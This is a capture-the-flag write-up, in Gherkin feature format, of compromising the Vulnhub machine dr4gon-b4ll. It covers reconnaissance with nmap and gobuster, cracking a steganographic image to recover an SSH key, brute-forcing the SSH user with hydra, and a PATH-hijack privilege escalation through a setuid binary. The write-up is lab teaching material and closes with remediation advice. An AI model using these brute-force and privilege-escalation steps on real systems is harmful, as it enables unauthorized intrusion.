## Version 1.4.1
## language: en

Feature:
  TOE:
    dr4gon-b4ll
  Category:
    Covert Channel
  Location:
    http://192.168.103.130:80/DRAGON%20BALL/Vulnhub/aj.jpg
  CWE:
    CWE-515: Covert Storage Channel
  Rule:
    REQ.261: https://fluidattacks.com/products/rules/list/261
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better avoid exposing sensitive information such as keys or passwords
    which can be used later to access to the system

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Burp Suit Community Edition| 2021.2.1 |
    | Gobuster                   | 3.0.1    |
    | Nmap                       | 7.91     |
    | SearchSploit               | 3.8.3    |
    | Hydra                      | 9.1      |
    | stegcracker                | 2.1.0    |

  TOE information:
    Given a .OVF file
    When I saw its extension
    Then I executed it on vimware
    Then I saw that the machine was running Debian in its version 10
    And it was requesting a user as it's shown in [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet8
    """
    And I got the next result
    """
    vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 192.168.103.1/24 brd 192.168.103.255 scope global vmnet8
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.103.0/24
    """
    And I got the next result
    """
    Nmap scan report for 192.168.103.1
    Host is up (0.0012s latency).
    Nmap scan report for 192.168.103.130
    Host is up (0.00085s latency).
    """
    Then I knew that 192.168.103.130 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 192.168.103.130
    """
    And I got the next result
    """
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 b5:77:4c:88:d7:27:54:1c:56:1d:48:d9:a4:1e:28:91 (RSA)
    |   256 c6:a8:c8:9e:ed:0d:67:1f:ae:ad:6b:d5:dd:f1:57:a1 (ECDSA)
    |_  256 fa:a9:b0:e3:06:2b:92:63:ba:11:2f:94:d6:31:90:b2 (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: DRAGON BALL | Aj's
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I saw that ports 22 and 80 were running SSH and HTTP respectively
    And SSH and HTTP were using 2.0 and 2.4.38 versions

  Scenario: Normal use case
    Given HTTP service was working on port 80
    Then I accessed to site webpage on http://192.168.103.130:80 using browser
    And thus I could see the webpage [evidence](02.png)

  Scenario: Static detection
    Given I could access to the source code in the main webpage
    When I analyzed its content
    Then I found an interesting comment [evidence](03.png)
    Then I selected the comment using burp suit
    And thus I found the next clue [evidence](04.png)
    Then I found out a directory [evidence](05.png)

  Scenario: Dynamic detection
    Given the previous discovered information
    When I was analyzing the source code in the main webpage
    Then I decided to search other possible hidden directories with gobuster
    Then I executed the below command
    """
    gobuster dir -u 192.168.103.130 -w/usr/share/seclists/Discovery/Web-Content
    /raft-large-words.txt -x php,html,txt -s 200,204,301,302,307,401
    """
    And thus I got the next output
    """
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.103.130
    [+] Threads:        10
    [+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/raft-large-
    words.txt
    [+] Status codes:   200,204,301,302,307,401
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html,txt
    [+] Timeout:        10s
    ===============================================================
    2021/03/08 15:21:56 Starting gobuster
    ===============================================================
    /index.html (Status: 200)
    /. (Status: 200)
    /robots.txt (Status: 200)
    ===============================================================
    2021/03/08 16:15:56 Finished
    ===============================================================
    """
    Then I checked the robots.txt file
    And I found a strange message
    Then I analyzed the message with burp suit
    And thus I found out the hidden message [evidence](06.png)
    Then I tried accessing to that directory but it didn't exist
    Then I accessed to the DRAGON BALL directory again
    And there I saw the secret.txt content
    Then I found a possible directories list as it can see below
    """
    /facebook.com
    /youtube.com
    /google.com
    /vanakkam nanba
    /customer
    /customers
    /taxonomy
    /username
    /passwd
    /yesterday
    /yshop
    /zboard
    /zeus
    /aj.html
    /zoom.html
    /zero.html
    /welcome.html
    """
    Then I searched those directories but none of them existed
    Then I entered to the Vulnhub directory [evidence](07.png)
    And I analyzed its content
    Then I accessed to the login.html file [evidence](08.png)
    Then I tried logging in the form but it didn't work
    Then I used burp suit to send a post request but it didn't work too
    Then I found two links in the webpage
    """
    Forget Password?
    Download
    """
    Then I clicked on the first of them but I didn't get any relevant
    Then I clicked on the second one
    And I was redirected to the following address
    """
    http://192.168.103.130/DRAGON%20BALL/Vulnhub/aj.jpg.
    """
    Then I got an error
    Then I removed the last point in the last address
    And thus I got an image file [evidence](09.png)
    Then I downloaded that image
    And I analyzed its content
    And its metadata but I didn't found anything
    Then I tried founding out a hidden message using a hexadecimal analyzer
    And a steganography tool in the next web site
    """
    https://stylesuxx.github.io/steganography/
    """
    Then none of them worked
    Then I used the stegcracker tool to do a brute force attack
    And thus I found out the embedded message and password as it can see below
    """
    StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
    Copyright (c) 2021 - Luke Paris (Paradoxis)
    StegCracker has been retired following the release of StegSeek, which
    will blast through the rockyou.txt wordlist within 1.9 second as opposed
    to StegCracker which takes 5 hours.
    StegSeek can be found at: https://github.com/RickdeJager/stegseek
    No wordlist was specified, using default rockyou.txt wordlist.
    Counting lines in wordlist..
    Attacking file '4.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
    Successfully cracked file with password: love
    Tried 451 passwords
    Your file has been written to: 4.jpg.out
    love
    """
    Then I checked the resulting file with the command
    """
    cat 4.jpg.out
    """
    Then I saw a private SSH key [evidence](10.png)
    Then I pasted that key in the .ssh directory
    And I tried accessing to the target system with the following command
    """
    ssh root@192.168.103.130
    """
    And it didn't work
    Then I tried to find the user using Hydra with the next commands
    """
    hydra -L /usr/share/wordlists/rockyou.txt -p love ssh://192.168.103.130
    hydra -L /usr/share/wordlists/rockyou.txt -e "n"  ssh://192.168.103.130
    """
    And thus I found the user for the password love [evidence](11.png)

  Scenario: Exploitation
    Given the username previously found
    Then I logged me with that user and password
    And I accessed to the target system through SSH [evidence](12.png)
    Then I executed the next command to know which privileges the user had
    """
    sudo --list
    """
    Then I got the next message
    """
    Sorry, user cyber may not run sudo on debian.
    """
    Then I searched information about kernel system with the below command
    """
    uname -a
    """
    And I got the following information
    """
    Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2
    (2020-11-28) x86_64 GNU/Linux
    """
    Then I searched an exploit for that kernel
    And thus I got the next options
    """
    ----------------------------------------- ---------------- --------
    Exploit Title                                            |  Path
    ----------------------------------------- ---------------- --------
    Linux Kernel 4.15.x < 4.19.2 - Local Privilege Escalation| 47164.sh
    Linux Kernel 4.15.x < 4.19.2 - Local Privilege Escalation| 47165.sh
    Linux Kernel 4.15.x < 4.19.2 - Local Privilege Escalation| 47166.sh
    Linux Kernel 4.15.x < 4.19.2 - Local Privilege Escalation| 47167.sh
    -------------------------------------------------------------------
    """
    Then I tried executed all of them but none of those worked
    Then I listed the home directory files with the command
    """
    ls -l /home
    """
    Then I saw the next directory
    """
    drwxr-xr-x 5 xmen xmen 4096 Mar  8 15:08 xmen
    """
    Then I checked the xmen directory
    And thus I found the following files
    """
    -rw-r--r-- 1 xmen xmen   43 Jan  2 06:47 local.txt
    drwxr-xr-x 2 root root 4096 Jan  4 21:30 script
    """
    Then I looked the local.txt content
    And I discovered the next flag
    """
    your falg :192fb6275698b5ad9868c7afb62fd555
    """
    Then I entered in the script directory
    And I revised the files in that directory with the command
    """
    ls -l script
    """
    Then I saw the two files below
    """
    -rw-r--r-- 1 root root    75 Jan  4 21:30 demo.c
    -rwsr-xr-x 1 root root 16712 Jan  4 21:20 shell
    """
    When I analyzed the previous output
    Then I noted that shell file had a setuid permission enable
    Then I executed that file
    And thus I got the ps execution
    """
    PID TTY          TIME CMD
    737 pts/0    00:00:00 su
    8378 pts/0    00:00:00 shell
    8380 pts/0    00:00:00 sh
    8381 pts/0    00:00:00 ps
    """
    Then I checked demo.c file
    And I got the following code
    """
    #include<unistd.h>
    void main()
    { setuid(0);
      setgid(0);
      system("ps");
    }
    """
    Then I noted that it was setting the user and group id to the root id
    Then it was executing ps as it'd concluded previously
    Then I created a file in the tmp directory with the name ps
    And I edited its content adding the following sentence
    """
    /bin/sh
    """
    Then I added execution permissions to that file
    And I modified the environment variable $PATH in the next way
    """
    export PATH=/tmp:$PATH
    """
    And thus after executing a file it'd search first in the tmp directory
    Then I executed the shell file one more time
    And in that way I got the root privileges
    Then I accessed to root directory
    Then I listed the files in that directory with the command
    """
    ls -l /root
    """
    Then I got the next output
    """
    -rw-r--r-- 1 root root 509 Jan  5 01:52 proof.txt
    """
    Then I visualized that file and solved the challenge [evidence](13.png)

  Scenario: Remediation
    Given the source code in the main webpage has some comments
    And sensitive information is stored with a steganography technique
    And those files are available to the unauthorized users
    And some files administrative can be executed by unprivileged users
    Then it'd better erase comment before uploading a webpage in production
    And avoid storing sensitive information in files available to the public
    And avoid that a system user executed files with root privileges

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     8/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.7/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.7/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-09
